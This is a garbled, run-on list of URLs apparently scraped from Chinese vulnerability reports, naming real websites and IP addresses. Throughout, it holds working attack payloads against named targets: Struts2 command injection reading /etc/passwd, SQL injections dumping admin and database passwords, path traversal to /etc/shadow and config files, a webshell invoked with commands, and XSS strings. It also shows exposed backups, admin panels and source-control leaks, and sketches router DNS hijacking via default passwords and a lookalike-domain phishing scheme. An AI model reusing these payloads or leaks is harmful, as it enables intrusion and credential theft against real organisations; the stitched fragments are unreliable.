http://www.dmshu.com//plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0 http://shop.letv.com/user/center/orderPay.html?orderId=1309111506618&orderPrice= http://shop.letv.com/user/center/orderPay.html?orderId=1309111503377&orderPrice=0.1&payMentMethodId=ON-LEZF-ALIPAY-BALANCE-ALP&stage=1 http://m.189gs.com/ http://i.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://a.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://i.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://i.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://www.eecn.com.cn/about/login.action http://117.79.80.22:8082/login http://117.79.80.22:8082/gfan/home http://www.youku.com/playlist_show/id_19875897.html http://zhibonet.com/iptv2/view/familyChannelList.action http://www.icoou.com/files/ http://www.icoou.com/files/2012/07/23/20120723114823_7320.txt http://jk.easou.com/upload/ http://118.145.13.12/ http://120.197.95.240:8080/ http://120.197.95.104/ http://api.mam.sdo.com/pay.php?phoneid=手机号&ordersn_game=MA_APPLE_60MC&money=6.0¬ifyurl=http%3A%2F%2F10.31.23.133%3A10001%2Fconnect%2Fweb%2Fpayment%2Fsnda_verify_receipt&ext=手机号&channel=M216&itemname=60MC&appid=1000 http://data.bd.baofeng.com/ http://data.bd.baofeng.com/gotologin.box http://data.bd.baofeng.com/admin/main.jsp http://vip.club.sohu.com/szzmjc/manage/sort?num=1&id=XX vip.club.sohu.com/szzmjc/models/zmjc.php http://www.36kr.com/account/edit http://xss.tw/xxxx http://www.36kr.com/u13789163xx,发现title直接调用了用户个性签名内容,由于该处调用未进行输出导致xss代码执行。(看官见谅,马赛克打的有点晕。) http://www.cecb2b.com/brand/index.do http://market.bitauto.com/webadmin/ http://www.99inn.cc/Club.aspx?id=38 http://www.avic.com.cn:81/rczpzb/zpxx.asp?sid=469 http://www.ssfdc.gov.cn/details.php?id=1695 www.cnpubg.com http://mail.cnpubg.com/ http://mail.cnpubg.com/help/list.swf http://mail.cnpubg.com/include/config.inc http://www.baitw.com/help.action http://www.gcdr.gov.cn/1.rar http://usercenter.joy.cn/usercenter.do?m=userInfo&var=%3E%3Cscript%3Ealert%28%27Hello%20World!%27%29%3C/script%3E&charset= http://dig.chouti.com/link/5194578 http://dig.chouti.com/link/self/add?linksId=帖子ID http://dig.chouti.com/link/self/del?linksId=帖子ID clsid:43D36B68-DB27-4250-A584-F5F5A381C3FE http://cbnclub.yicai.com/assets/ http://cbnsearch.yicai.com/phpinfo.php http://m.hujiang.com/ http://m.hujiang.com/en/p531890/ http://ts.hjenglish.com/yingyu_guanlian/432522/ http://kefu.hujiang.com/feedback/ www.shouye.com http://jinyuedb.com/admin http://jinyuedb.com/admin/sctp.aspx https://www.labi.com/resetPassword http://acg.07073.com/plus/view.php?aid=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0 https://passport.gozap.com/findPassword!reset.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.vmaibo.com/.svn/entries http://biz.vmaibo.com/.svn/entries http://read.vmaibo.com/.svn/entries http://vmaibo.com http://vmaibo.com svn://127.0.0.1:3396/vmaibo-person svn://127.0.0.1:3396 http://read.vmaibo.com http://read.vmaibo.com svn://219.239.***.*:3396/vmaibo-read svn://219.239.***.*:3396 http://rtoct.mspcloud.cn/rtc_client/RTCWebClient/pinInput.action http://www.lagou.com/lagouAdmin/logins http://www.ls12365.gov.cn/www.rar http://www.bdszjj.com/1.rar http://cbnxy.yicai.com/data/ http://cbnxy.yicai.com/images/ http://cdms2011.yicai.com/images/ http://cdms2011.yicai.com/data/ http://cfv.yicai.com/images/ http://csr.yicai.com/images/ http://cxcx.yicai.com/images/ http://www.vogue.com.cn/fno/2013/ibrand.php?sellerid=11 http://fwzx.fy.gov.cn/fwzx.rar http://m.liveuc.net/baidu/dbcall/,这个地址,应该是百度的,这个比较奇葩的是直接把各个会议室的地址写在js中,直接登入了会议室参加培训吧。 www.Solidot.org www.solidot.org/~用户名 www.solidot.org/~xj5306 https://3g.mbs.boc.cn/BOCWapBank/OVPLognFwLoginPwdMod.ovpdo?country_key=GB%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://open.letvstore.com/ http://open.letvstore.com/update_version.html?108959 http://www.sjz12365.gov.cn/www.sjz12365.gov.cn.rar http://www.cxzw.gov.cn/web.rar http://guodiantong.sgepri.sgcc.com.cn http://www.gzaj.gov.cn/database.rar http://www.xczj.gov.cn/xczj.rar http://www.butao.com/static/express/biz_express_8.xls http://www.butao.com/static/express/biz_express_8.xls http://www.butao.com/static/express/biz_express_9.xls http://passport.baidu.com/?business&aid=6&default_tab=1&un=XXXXXXXXXXXX#1 http://tieba.baidu.com/f/upost?un=%CE%E1%CE%AA%B4%F3%D6%F7%D4%D7&t=1378993929110&pn=X&rn=X http://www.qgsp.gov.cn/111.rar data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://www.imcoal-safety.gov.cn/www.imcoal-safety.gov.cn.rar http://my.xcar.com.cn/favorite/index.php?action=addthread&id=19454122&title=helloaika¬ing=a.jpg http://www.xcar.com.cn/bbs/my.php?item=favorites&tid=19454122&inajax=1¬ing=a.jpg http://live.baomihua.com http://3g.mop.com/login.jsp http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://member.aili.com/?c=member&m=member&a=editpersonal&data%5Bname%5D=test&data%5Bsex%5D=0&data%5Bbirthday%5D=1970-01-01&data%5Bstar%5D=&data%5Bprovince%5D=&data%5Bcity%5D=&data%5Barea%5D=&data%5Bprofession%5D=%CF%FA%CA%DB&data%5Bmarriage%5D=0&data%5Beducation%5D=0&data%5Btip%5D=test www.leliu.gov.cn/nanshui/bg/leftword.aspx?page=1&title=&type= http://i.qichetong.com/uXXX/!forum/ http://i.qichetong.com/u2/!forum/ http://i.qichetong.com/u2192830/!forum/ http://www.bjchy.gov.cn/login.jsp http://202.117.3.47/admin/index.do http://202.117.3.47/uploadFile/1378917041999.jsp http://www.tcxzzx.gov.cn/wwwroot.rar http://t.yicai.com/.svn/entries http://t.yicai.com/.svn/all-wcprops http://t.yicai.com/source/.svn/entries https://10.10.140.42:88/svn/dev/cbnsns/source https://10.10.140.42:88/svn/dev https://10.10.140.42:88/svn/dev/cbnsns https://10.10.140.42:88/svn/dev http://202.113.16.3/ http://202.113.16.50/ http://duokoo.baidu.com/novel/?R=517&v=2&pageid=E70dlhtt&bck=1386&jump_p_id=M5ht79md&logout=1&outoken=d1f753d5ba3d557beda7715e09f9b61e&ssid=0&from=0&bd_page_type=1&uid=4850E0C9145E3CB2EFC9AAE552E0F3F8&pu=sz%40224_220%2Cta%40middle___3_537&fr=home&netFlag=cmnet&usid=062921E7609FB5C3A8A80BEB1CDD97B1&rdtp=0&dkfrc=1 http://xin.766.com/fahao/index.php?c=xin&m=content&accid=51 www.sy-kingdee.com/Products_show.asp?mid=95 http://www.3wcoffee.com/主站.试了下几个账号 http://exmail.qq.com/cgi-bin/readtemplate?check=false&t=biz_rf_portal#recovery http://serviceshop.lenovo.com.cn/ http://serviceshop.lenovo.com.cn/purchase/orderconfirm.aspx?orderNo=B0130913000031 http://serviceshop.lenovo.com.cn/purchase/orderconfirm.aspx?orderNo=B0130912000012 http://webmail.iscas.ac.cn/login.action http://video.cast.org.cn/index.php?option=com_content&id=701%20id=701 http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4 http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4 http://www.114school.cn/xytypt/typt/index/userlogin.jsp http://www.yonyou.com.hk/new/download_view.php?uid=4 http://sus.lenovomm.com http://sus.lenovomm.com/adpportal/application/delete.do?appId=11503&pageNumber=1 http://219.239.230.4:8090 http://219.239.230.4:8090/index.php/list/index?ct=file&ac=userfile&aid=2&cid=0&tpl=view_pg&limit=35x&_t=1378971582006&o=file_name&a=1 http://b2b-hk.ce-air.com/MUB2B/login.do http://www.ad4app.cn/forgetPassword.do http://www.dyzs189.com/bnet/user-login!password.do http://www.carpad.com.cn/Portal/web/customer/password.action http://www.appeasou.com/user!userLogin.action http://ny.agri.gov.cn/index/ http://219.141.228.206/ http://zhidao.baidu.com/expert/api/browse?cid=undefined&pn=1&rn=16 http://active.zhongliangwomai.com:8080/smartredm/welcome.do http://invite.zhongliangwomai.com:8080/smartredm/welcome.do http://218.241.156.29:8080/smartredm/welcome.do http://www.yyjzt.com/fckeditor/editor/fckeditor.html http://www.yyjzt.com/uploadfiles/Image/X.jsp http://202.113.16.117/ http://202.113.16.117/cgi-bin/bbs/bbshelp?file=../../../../../../../../../../etc/passwd http://202.113.16.117/cgi-bin/bbs/bbshelp?file=../../../../../../../../../../etc/my.cnf http://202.113.29.5/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://v.dahe.cn/index.php?option=com_content&ItemId=91%20ItemId=91 http://localhost/test.asp;/1.txt https://passport.lenovo.com/wauthen/resetpassword.jsp e-learning.lenovo.com.cn/user/registration http://e-learning.lenovo.com.cn/user/registratio http://ideaclub.lenovo.com.cn/club/ http://www.vmaibo.com/sentiment/getKeywords?limit=5 http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5010000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5020000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5030000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5040000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5050000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5060000x*/ http://www.baima.com/ http://219.239.230.4:28017/ http://219.239.230.6:28017/ http://219.239.230.8:28017/ www.tianshui12388.gov.cn/​admin/​admin_​add.asp http://www.dfyb.com/newcenter/NewsCenter_List.asp?newsclass=2&newstype=%C3%BD%EF%BF%BD%E5%B1%A8%EF%BF%BD%EF%BF%BD http://www.nqssfj.gov.cn/nqssfj.rar http://me.07073.com http://www.wdpfw.gov.cn/1.rar http://www.ynmj.gov.cn/wwwroot.rar http://www.cdswbb.gov.cn/wwwroot.zip https://116.77.72.213/Java/jviewer.jnlp http://www.ngjw.gov.cn/1.rar http://www.qdnsf.gov.cn/qdnsf.rar http://www.masdl.gov.cn/database.rar www.taоbao.com),浏览器会自动识别为:www.xn--tabao-kye.com www.xn--tabao-kye.com,到万网查询,是可以注册的 www.xn--tabao-kye.com里加入跳转代码,跳回淘宝官方网址,利用中间跳转的几秒做文章,用户只会感觉打开稍慢,并不会有其他疑问,同时可以跳出个弹窗,让提交个账号密码啥的。 http://www.ycsjyj.gov.cn/web.rar http://www.sqmlr.gov.cn/qlyg_web/sb.jsp?itemid=JS130000GT-QR-0001 http://erp.suning.com.cn/login.jsp http://hndczx.mep.gov.cn/pub/dcwh.jsp?s=dcyj http://bbs.aoshitang.com/ http://xsst.sinaapp.com/xsstest1.swf?test=xsstest http://115.182.51.86/ http://115.182.51.86//wenba/my_answer.php?status=1'%22 http://www.diocoffee.com/ http://www.diocoffee.com/1937cN.txt http://www.ubc-coffee.com.cn/a.asp;.jpg http://b2bkm.suning.cn:9080 http://b2bkm.suning.cn:8787/MyPhoto/1_0_fbb204a4061ffbd41284a84c258c1bfb.txt http://www.xiaomi.cn/html/special/MiFlash/ http://licaike.hexun.com/SysDetail.action?seqId=00001013 http://ewp.suning.com.cn/main/login.jsp http://ewp.suning.com.cn http://www.enkj.com/fastlogin/weibo/return_url.asp?id= http://venus.suning.com/ http://venus.suning.com/TestDemo/WebForm2.aspx http://bbs.liebao.cn/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://bbs.liebao.cn/forum.php?mod=viewthread&tid=180164&page=6&extra=#pid4069459 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u004a\u0064\u0073\u0065\u0063\u0022\u0029\u003e/1.swf[/flash http://bbs.app111.com http://iosfile.feng91.com/album/cover/9b/15.jpg http://bbs.app111.com/data/attachment/album/cover/9b/15.jpg http://bbs.app111.com/test.php http://bbs.app111.com/data/.svn/entries http://svn.pcpop.com/svn/searchbbs/bbs/it168/ios/trunk/data_dist http://svn.pcpop.com/svn/searchbbs svn:special svn:externals svn:needs-lock http://kpym.cast.org.cn/cms/contentmanager.do?metho http://pan.baidu.com/share/link?shareid=3236949238&uk=102124124 http://tyj.zhengzhou.gov.cn/ http://tyj.zhengzhou.gov.cn/sysadmin/login.do http://www.dengfeng.gov.cn/sysadmin/login.do http://www.lyjjw.gov.cn/sysadmin/login.do http://www.zzta.net/sysadmin/login.do http://www.chtongxu.gov.cn/sysadmin/login.do http://www.xinxiang.gov.cn/sysadmin/login.do http://kf.dxyq.org/sysadmin/login.do http://www.zhongyuan.gov.cn/sysadmin/login.do http://dxyq.zzsdc.com/sysadmin/login.do http://zznet.com.cn/sysadmin/login.do http://www.lhhbj.gov.cn/sysadmin/login.do http://ww.ty.gov.cn/sysadmin/login.do http://www.hajz.hrss.gov.cn/sysadmin/login.do http://www.xcnj.gov.cn/sysadmin/login.do http://e-learning.lenovo.com.cn http://e-learning.lenovo.com.cn/user/recovery host:10.15.186.247 http://www.zxnq.gov.cn/Admin_Add.asp http://www.adbc.com.cn/a.zip http://61.132.0.41/ http://tee.sports.sohu.com/help/badword.php http://www.iwoak.com/sage/sagenews.aspx?TypeID=94 http://xx.com/123 http://czj.tz.gov.cn/czj/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/aspx/connector.aspx http://www.tudou.com/plcover/92Izzv8fVeo/ http://lvyou.baidu.com/notes/0433214497bc2d0992adf09c http://mrp.nsfc.gov.cn/?mn=main&mo=news&mv=N&nid=32 http://jtst.moc.gov.cn:8086/ShowPage.aspx?pid=502 http://v2.freep.cn/3tb_130915105320dmy8512293.jpg www.bjchy.gov.cn/login.jsp www.sczhb.com/admin/ www.jiangxian.gov.cn/admin/ www.linzi.gov.cn/login.jsp www.wendeng.gov.cn/web.aspx http://coop.xuwen.gov.cn/xj.asp www.yqcq.gov.cn/Databases/0791idc.mdb www.sccw.gov.cn/KS_Data/KesionCMS5.mdb www.shidao.gov.cn/11.rar www.gzz.gov.cn/website.rar www.tianshui.gov.cn/1.rar www.qyzwfw.gov.cn/admin/aspcheck.asp www.lzflcp.com/ zhxy.hubu.edu.cn/onet/jpkc/rwdl/admin/Databackup/1.asa www.sxmu.edu.cn/admin/fckeditor/editor/fckeditor.html www.sxtvi.edu.cn:9080/admin/login.aspx .snnu.edu.cn/admin/ https://www.dnspod.cn/proxy_diagnose/recordscan/dnspod.cn?callback=xsscode https://www.dnspod.cn/proxy_diagnose/recordscan/dnspod.cn?callback= http://202.45.69.33/lib http://book.weibo.com/booklist/12188 http://www.lzhc.gov.cn:8082/general/ http://www.lzhc.gov.cn:8082/mysql/index.php http://leader.railstone.com.cn/ http://www.railstone.com.cn/rems/file/downloadFile.action?actionType=success&\suffix=jpg&filePath=/etc/passwd&fileName=a.jpg http://www.railstone.com.cn/rems/poramount/${pageContext.request.contextPath}/rems/file/downloadFile.action?actionType=success&suffix=jpg&filePath=/etc/passwd&fileName=head1.jpg http://chat.soufun.com/zhibo/manage/login.aspx http://you.ctrip.com/members/photos/AlbumUpload.aspx http://211.136.119.121:30025/zhgy/userAction/loginInit.action http://vdisk.weibo.com/s/z1id0otCRMVPt http://www.kaixin001.com/home/ http://top.cn.msi.com/connect.aspx?id= http://info.02156.cn/NewsMessage.aspx?newsid=2187 http://www.mogujie.com/settings/personal http://www.suning.com.cn/djgz/category.asp?id=1 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= data:text/htmlbase64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4= http://careers.suning.cn/rps-web/ftl/resume/personalResume.htm http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://58.135.253.9/masmanage/mas_page/ http://58.135.253.9/masmanage/mas_page/system/login.do data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://202.117.24.168/cm/main.jsp http://202.117.24.168/cm/detailxml?internalid=245462 http://202.117.24.168/manager/html/ http://baike.baidu.com http://www.digitalchina.com/ http://venus.suning.com/ http://venus.suning.com/TestDemo/WebForm2.aspx http://58.248.41.223/main/UserManager-esmsLogin.action http://m.test.app.uc.cn/app/index.php?system=admin http://124.133.52.150/study/admin.php/Index/login http://duiyi.tom.com/.svn/entries http://dealer.auto.sohu.com/tianbao/index.html http://parse.at.zhihu.com:8567/wooyun http://www.mogujie.com/trade/generateorder/account# www.mogujie.com http://tv.hebei.gov.cn/default.aspx?pdid=dbc5a998-5765-4f03-b1b9-6d0b8bf724fa http://xinfang.nanning.gov.cn/getpwd.asp?DepartNo=001000000000&UserName= http://canlian.kaiping.gov.cn/ http://219.141.254.195/djqy/integration/InfoManager/ http://219.141.254.195/djqy/integration/ http://219.141.254.195/djqy/integration/InfoManager/addAction.jsp20111102 http://219.141.254.195/djqy/integration/InfoManager/infoItemList.jsp20111025 http://219.141.254.195/djqy/integration/productMaintanance/addProductMaintanance.jsp?protypeid=1&corid=20060508134929875&organid=73103&opttype=add http://219.141.254.195/djqy/fileupload/fileMod.jsp?tableName=t_asb_hasfiles&sourceID=21200822&filetype=20 http://219.141.254.195/djqy/fileupload/fileMod.jsp?tableName=t_asb_hasfiles&sourceID=21200822&filetype=21 http://219.141.254.195/djqy/doc/allfiles/20/21200822_2062695187.jsp?cmd=命令 http://219.141.254.195/djqy/doc/allfiles/20/21200822_2062695187.jsp?cmd=ifconfig http://119.6.251.107:8080/uniportal/frame/welcome.action http://119.6.251.107:8080/uniportal/frame/welcome.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://119.6.251.107:8080/uniportal/hsxa.jsp http://119.6.251.107:8080/uniportal/myxx.jsp http://zhuanti.club.news.sohu.com/user_webpage/del_kind_form.php?kindid=125821 http://zhuanti.club.news.sohu.com/user_webpage/modify_content_form.php?kindid=125819 http://zhuanti.club.news.sohu.com/user_webpage/del_kind_form.php?kindid=125821%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 http://www.ijob.gov.cn/web/personsearch.action bbs.manaren.com/uc_server//index.php?m=pm_client&a=view&pmid=1029&folder=outbox&filter=&extra=page%3D http://home2.xywy.com/index.php?type=index&uid=1970053 http://weibo.com/comment/A9BrmkUjG http://wooyun.org/bugs/wooyun-2010-023055 http://www.hillstonenet.com.cn/training/registration.php?id=314%27 Query:SELECT Error:You Errno:1064 Message:MySQL http://www.hzsrsj.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml http://www.hzsrsj.gov.cn/lemis/LogonDialog.jsp event21.wanmei.com/w2i/pwic/w2iPwic!show.action?id=315 http://www.gs.zjut.edu.cn/zsxx/qita/grs/Editor/存在遍历目录 http://www.gs.zjut.edu.cn/zsxx/qita/grs/Editor/db/beditor1013.mdb http://mo-fang.com/shop_show.php?id=609 http://download.enet.com.cn/php/clist.php?cid=3 http://www.361tuan.com/chengdu/groupbuy/oldBuyDetail.action?groupbuyID=8 www.baidu.com@wooyum.com.本来想传个图的。但是奈何本屌的手机不行啊。手机的截图放到电脑就高级马赛克了。。。 http://bk.qz828.com/1.rar http://houe.qz828.com/1.rar http://house.e.qz828.com/1.rar http://www.qz828.com/1.rar http://wwws.qz828.com/1.rar http://wwwt.qz828.com/1.rar http://wwww.qz828.com/1.rar http://zblog.qz828.com/1.rar http://expert.womai.com/wp-login.php http://expert.womai.com/wp-login.php http://maishihui.womai.com/ http://expert.womai.com/maifood/wp-login.php http://s.mogupai.com/content.php?id=119 http://www.tysci.com http://www.tysci.com/downloads/ http://www.ncedu.com.cn:8080/cms/web/downloadFiles.jsp?file=/etc/shadow直接在file参数后面写上文件绝对路径,便可以下载获取到相应文件 http://www.ncedu.com.cn:8080/cms/web/downloadFiles.jsp?file=/etc/apache/httpd.conf http://tz.loupan.com/loupan/xinmingbandaoyunshuixuanshangpu http://www.vansn.com/user/userLogin.action http://egov.xinjin.gov.cn:8081/aems/login/login!userLogin.action http://221.237.182.14:8081/APMS/login/login!userLogin.action http://www.zwzx.day.gov.cn/APMS/login/login!userLogin.action http://mail.shmetro.com bbs.manaren.com/uc_server//index.php?m=pm_client&a=view&pmid=28518&folder=inbox&filter=announcepm&extra=page%3D http://www.zhulang.com/w_book_info.php?bookid=192883&c=../../../../../../../../../../etc/passwd%00.jpg http://baozoumanhua.com/fetchpass http://baozoumanhua.com/login http://60.247.100.70:9090/webstat/ucstarclient_webcall/client/ucallclient_1.jsp http://60.247.100.70:9090/upload/ http://gpassport.gsta.com/Login.aspx?url=http%3a%2f%2fwww.gsta.com%2fadmin%2f http://gmy.gsta.com//profile.aspx/?userid=1 http://gpassport.gsta.com/Login.aspx?url=http%3a%2f%2fwww.gsta.com%2fadmin%2f http://gadmin.gsta.com/ www.zhulang.com http://t.sohu.com/follow/addfollows http://www.zhulang.com/ http://58.60.0.82:8080/sms/UserInfoAction.action www.e696.com http://project.ccidnet.com/cases/page/template/searchCases.do?method=showCase&classid=1&appclass1=0&appclass2=0&dataorder= http://tv.tom.com/App_User_UserUpload.php?type=1&us http://www.swqdsj.gov.cn/admin/login.aspx http://113.247.238.148:4000/kfqy/ http://113.247.238.148:4000/kfqy/admin/save_psw.jsp?oldpsw=1 http://www.800app.com/company/crm-onlinekhfk.htm http://www.cpgroup.cn/Search.aspx?keys= https://passport.baidu.com/?getpass_index http://www.cnave.com/fckeditor/editor/fckeditor.html http://kfgl.hasee.com///lookup/peizhi/ http://www.lvye.org/modules/lvyebb/rate.php?id=44245623%20union%20select%20current_user%2Cpassword%20%20from%20mysql.user%20-- http://mail.chinasarft.gov.cn/ http://bookshop.cnpeak.com.cn/vip/EditUserInfo.aspx http://www.cnpeak.com/ http://group.cnpeak.com/ http://bookshop.cnpeak.com.cn/ http://nanlew.com/ http://www.nanle.gov.cn/ http://www.0393vip.com/35/好像是防的精良网站源码,可以进行cookie注入。后台账号:admin http://www.pybxxh.com/ http://www.nanle.gov.cn/ http://nanlew.com/ http://www.zyxxg.cn/ http://www.pyxxg.cn/ http://www.pyssyj.com/ http://520393.com/ http://zhaoren.t.qq.com/groupfrds.php?group_id=4006 ID:3的管理员账号 http://shizheng.xilu.com/20130917/1000010000094910.html http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=121.157.39.111&dnsserver2=114.114.114.114&Save=%B1%A3+%B4%E6 admin:admin,会变化,例如admin:123456,也就是利用路由器默认密码不断尝试修改路由器dns为121.157.39.111、114.114.114.114。 http://gz.dagushu.com/center.html。 http://gz.dagushu.com/center.html http://newspage.xilu.com/model/xilu_bottom.js http://www.tw.zjut.edu.cn/ http://www.china918.net/91805/newxp/Special_News.asp?SpecialID=26 http://www.china918.net/zlg/admin/login.asp http://www.china918.net/91801/newxp/admin/login.asp http://www.china918.net/91805/newxp/admin/login.asp http://www.china918.net/91806/newxp/admin/login.asp http://www.china918.net/91807/newxp/admin/login.asp http://www.china918.net/91808/newxp/admin/login.asp http://www.china918.org http://www.china918.cn http://www.gdjjs.zjut.edu.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://cftv.forestry.gov.cn:8080/ivss/web/jwzt/service09/meetingRoom/upload_img.jsp http://www.hengdianworld.com/index/index.do http://219.142.122.150:81 http://match.jxedu.gov.cn http://tieba.baidu.com/home/main?un=%E4%B9%8C%E4%BA%91 http://v.56.com/2006.php?qq-pf-to=pcqq.group http://bbs.xiangyang.net fair.sme.gov.cn/old/upload/pic/pic2320_02.jsp www.jh.gov.cn http://blog.emaze.net/2013/09/a-look-at-wechat-security.html http://static.apk.hiapk.com/html/2012/06/614689.html http://apk.hiapk.com/html/2012/11/997381.html http://apk.hiapk.com/html/2013/05/1495796.html https://play.google.com/store/apps/details?id=com.tencent.mm http://www.95590.cn/ebiz/view/onlineser/policyInfoDetail.jsp?policyNo={保单号 http://www.dfyb.com/sales/ProductPhoto.asp?productid=21 http://activity.zhulang.com/20120701wot/index.php?m=20120701wot&a=ReadBook&bk_id=63 http://m.airchina.com/atompub/form/air_user_management_html5?o=w&passengerId=614972&tempOrderId=0&isInternation=&n=tms.do%3FtranCode%3DTM0007 http://m.airchina.com/atompub/form/air_edit_record_html5?o=w&orderId=344391&n=tms.do%3FtranCode%3DGJ0008 www.114school.com.那么我们如何获取有用的电话号码呢?左边有一个找人按钮。可以根据关键词查找。随便输入152这样的数值。会出现很多手机号码。那么我们如何知道这个人是老师呢。可以通过查看微博的方式 http://www.sc.cei.gov.cn/Netw2Web/portal.aspx?APP=1 http://cglx.51taoshi.com/list.php?item_handle=xwhd http://www.uyan.cc/demo display:none http://tuan.mangocity.com/product/productList.aspx?city=%e4%b8%89%e4%ba%9a&productCount=1314 http://www.blsxzfw.gov.cn/css2.jsp http://www.center.gov.cn/evip/css2.jsp http://wscwh.gaoyou.gov.cn/css2.jsp http://www.dyqsk.gov.cn/k8cmd.jsp http://log.sanguosha.com/record2.php http://log.sanguosha.com/record2.php?logtype=1&logversion=1&logmessage=1&clienttype=1&clientversion=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29&account=1&nickname=1&userlevel=1&logintime=now%28%29 http://data.futures.hexun.com.tw/cccj.aspx http://renwu.hexun.com/search.aspx?z=A http://wizard.stock.hexun.com/tgfw_new/ifame2.aspx?teacher=%EF http://www.mingshitang.com/webadmin/ http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=/etc/passwd youkubj-pms:x:535:535::/var/www/html/youkubj-pms:/sbin/nologin http://minisite.youku.com/youkubj-pms/ http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=/var/www/html/youkubj-pms/include/common.php http://121.33.237.70:9090/login.jsp http://121.33.237.70:9090/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://121.33.237.70:9090/UserFiles/File/ http://121.33.237.70:9090/upload/szgov.xls http://www.huyigroup.com.cn/manage/specialClient.php http://www.huyigroup.com.cn/control/gallery.swf/.php 